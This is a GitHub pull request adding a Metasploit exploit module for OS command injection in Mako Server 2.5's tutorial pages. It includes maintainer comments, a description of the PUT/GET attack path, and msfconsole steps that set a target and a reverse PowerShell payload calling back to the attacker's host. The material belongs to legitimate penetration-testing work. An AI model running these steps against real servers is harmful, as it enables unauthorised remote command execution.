-
Notifications
You must be signed in to change notification settings - Fork 13.8k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Add Mako Server v2.5 command injection module/docs #9133
Conversation
Looks great, thanks! The exploit looks to work against the latest version and on other platforms, so I have added a ticket to do a little more work. If you want to do the porting let us know and we'll assign you to the ticket. |
Release NotesThis exploit targets arbitrary Lua injection in the examples shipped with the cross-platform Mako Server IoT development toolkit. |
Awesome! Thank you so much, I would be happy to do the porting to Linux. I can start development on the port this week. |
Please see additional changes in #9193. Thanks! |
Thanks for adding those changes @wvu-r7! I learned a lot from looking at your commit, I'll make sure to include these sorts of additions in future code. |
To be honest, this is a really clean module. Great work! |
That's great to hear, I'm trying hard to improve on my ruby programming and get accustomed to the framework. Thank you for the kind words! 👍 |
Also lands rapid7#9133, the docs for the same.
Add Mako Server v2.5 command injection module/docs.
This module exploits an OS command injection vulnerability in the tutorial page of Mako Server version 2.5 on Windows x86/x64 systems. It works by injecting arbitrary OS commands in the Mako Server tutorial page through a PUT request to save.lsp. Input will be saved on the target machine and can be executed by sending a GET request to manage.lsp.
Verification Steps
msfconsole
on hostuse exploit/windows/http/makoserver_cmd_exec
set RHOST <IP address of target system>
check
set PAYLOAD cmd/windows/reverse_powershell
set LHOST <IP address of host system>
exploit
Documentation
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/windows/http/makoserver_cmd_exec.md
Example Output
Example Verbose Output